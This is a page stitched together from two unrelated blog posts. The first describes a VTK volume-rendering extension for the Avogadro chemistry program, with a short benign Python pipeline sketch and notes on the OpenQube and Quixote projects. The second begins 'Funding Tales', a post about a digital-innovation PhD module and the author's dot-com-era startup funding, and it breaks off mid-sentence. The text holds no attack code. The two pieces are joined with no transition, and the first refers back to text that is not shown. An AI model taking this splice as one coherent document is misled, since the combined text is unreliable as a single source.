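For anyone who has not used VTK's volume rendering pipeline before, the general approach looks roughly like the minimal sketch below. This is not the extension's actual code: it is shown in Python against VTK's standard classes, with vtkRTAnalyticSource standing in for the cube/orbital data that the extension pulls out of the current molecule, and the fixed color and opacity points are placeholders much like the hardcoded parameters mentioned above.

    import vtk

    # Stand-in volume; the Avogadro extension would instead wrap the molecule's
    # first volume (e.g. an orbital or electron density cube) as vtkImageData.
    source = vtk.vtkRTAnalyticSource()

    # GPU-accelerated ray cast mapper does the actual volume rendering.
    mapper = vtk.vtkGPUVolumeRayCastMapper()
    mapper.SetInputConnection(source.GetOutputPort())

    # Transfer functions map scalar values to color and opacity (placeholder values).
    color = vtk.vtkColorTransferFunction()
    color.AddRGBPoint(40.0, 0.0, 0.0, 1.0)
    color.AddRGBPoint(250.0, 1.0, 0.0, 0.0)

    opacity = vtk.vtkPiecewiseFunction()
    opacity.AddPoint(40.0, 0.0)
    opacity.AddPoint(250.0, 0.3)

    prop = vtk.vtkVolumeProperty()
    prop.SetColor(color)
    prop.SetScalarOpacity(opacity)
    prop.SetInterpolationTypeToLinear()
    prop.ShadeOff()

    volume = vtk.vtkVolume()
    volume.SetMapper(mapper)
    volume.SetProperty(prop)

    # Standard VTK render window setup.
    renderer = vtk.vtkRenderer()
    renderer.AddVolume(volume)
    window = vtk.vtkRenderWindow()
    window.AddRenderer(renderer)
    interactor = vtk.vtkRenderWindowInteractor()
    interactor.SetRenderWindow(window)
    window.Render()
    interactor.Start()

In the real extension the equivalent pipeline is driven from C++, and the hoped-for next step mentioned above is combining it with Avogadro's own rendering of the molecule in the same window.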

I have also been working on several other things, such as splitting out the quantum calculation code from the Avogadro plugins and putting it in a small library. I have called the library OpenQube; right now it only has the base functionality that was in Avogadro, but I will be extending it with more features and regression tests, and I am hoping that, due to the decoupled nature and liberal BSD license, it will encourage wider collaboration in this field.

There is also the Quixote project which I am very excited about. Meaningfully storing the results of quantum calculations, annotating them and retrieving them within an open framework. This is a growing problem in today's world, and I am working on extensions to Avogadro to allow it to fully exploit the semantic chemical web. This includes some of the previous work to access the PDB and other public resources as well as private databases within groups and organizations.

I think this is going to be a very exciting year for Avogadro, and open source chemistry in general.


          Funding Tales - The Missing Link of High404 (Part 1)        

As part of the HighWire MRes/PhD programme we take a module (High404) dedicated to introducing digital innovation to the cohort.  This may seem a little odd; you'd kind of expect everyone taking such a programme to already be well versed in such things - this is, after all, a PhD in Digital Innovation funded through the EPSRC's Digital Economy theme.

But what make the HighWire crowd so unique is the incredibly wide and varied backgrounds of those in it.  In my cohort we go from fine art to computer science backgrounds and inevitably this means some are not as well versed in the digital as others.

Hence the module.  It’s not designed to make experts of everyone rather open eyes to history and futures.

The module is split in two.  A narrative which focusses upon the more traditional bits of digital innovation with topics such as mobile, cloud computing, ubiquitous computing, Web 3.0 and such.  And a meta-narrative which takes a wider look at the role of innovation with respect to such things as being meaningful, sustainability and the like.

Overall the module has provided me with a tonne of material to ponder, primarily in the meta-narrative (what with already having a pretty solid background in the narrative material), but there has been one topic that was not raised and yet is so very vital to innovation…

FUNDING

Innovation is so much more than invention.  It’s not about coming up with a great idea but rather being able to execute on that idea, develop and evolve it, bring it to the market (not necessarily a commercial one).   And this requires money, to research and develop the invention AND to bring it to market.   But first my own tale of funding digital innovation.

Cakehouse in the Bubble

Right at the outset of the first dot-com bubble in the late 1990's I was proud to be a co-founder of a technology startup - Cakehouse Systems.   We had a superb team of thinkers and arguably some of the best software developers in London, hand picked and armed with proper ninja coding skills, with C++ and Java being core.

At the time website search engines were really not a lot different from an offline Yellow Pages.  You filled out a form with the details of your fledgling website and submitted it, most likely to Yahoo!, who employed an army of staff to check you had correctly categorised your entry before allowing it into their carefully curated directory.

We had a superb idea.  Why not automatically map the links between websites, not only the hyperlinks themselves but also the semantic links?  Then allow people to manually augment those links with other information that had meaning to them. Effectively we were proposing building a semantic search engine for the Web based on a graph database - something truly novel at the time.

Unlike so many others in the bubble who were willing to work for equity, our crack team were not going to work for free. Thankfully we did not have the truly extravagant burn rates so common with other Internet startup companies at the time.

One example of the all too common dot-com boom and bust was a company I knew well - Sportal (formerly Pangolin) - which in 1998 had raised something in the order of £55M, yet by 2001 BSkyB (an investor) refused to buy the ailing business for £1, the company having laid off the majority of its staff after using the money to pay incredible salaries and furnish lavish offices.

We were somewhat more modest in our habits, but even with equal shareholding and salaries across the company some third party funding was going to be needed for an office, hardware, software licenses and so on.  Seed funding was readily obtained from a wealthy family member of one of the team.  It was a large six figure sum that, with our modest outlook, meant we were stable for 18 months; we even employed three more staff - a sales person and two more developers.  Things were looking good.

We worked hard, developed a great proof of concept and wrote a rock solid business plan.  A plan we took to several leading IT accountancy companies looking for help raising the next round of funding, a round big enough to build an Internet scale semantic search engine prototype.  It was a slog.  I honestly can’t recall how many funding meetings I attended with the managing director but it seemed like hundreds.

This slog was so difficult because Computer/Data/Internet technology innovation funding was discontinuous from previous innovation adoption s-curves. None of the traditional UK-based Venture Capitalists (VCs) knew how to approach it and instead adopted funding models from the curve of existing capital intensive innovation.  The importance of Angel investing was largely unrecognised at the time, and with little or no Angel funding ecosystem they flew well below the radar.
As a note, Silicon Valley VCs were able to adapt and adjust better than others simply because their risk profiles were vastly different and they had had more exposure to technology companies.
Eventually we did find and engage someone and went on to talk to dozens and dozens of potential VCs, but by then the market had changed.  Three things had happened.

The first was that VCs, certainly in the UK, had been stung by many of those high profile, high burn rate startups that held extravagant launch parties based on vapourware.  Very very few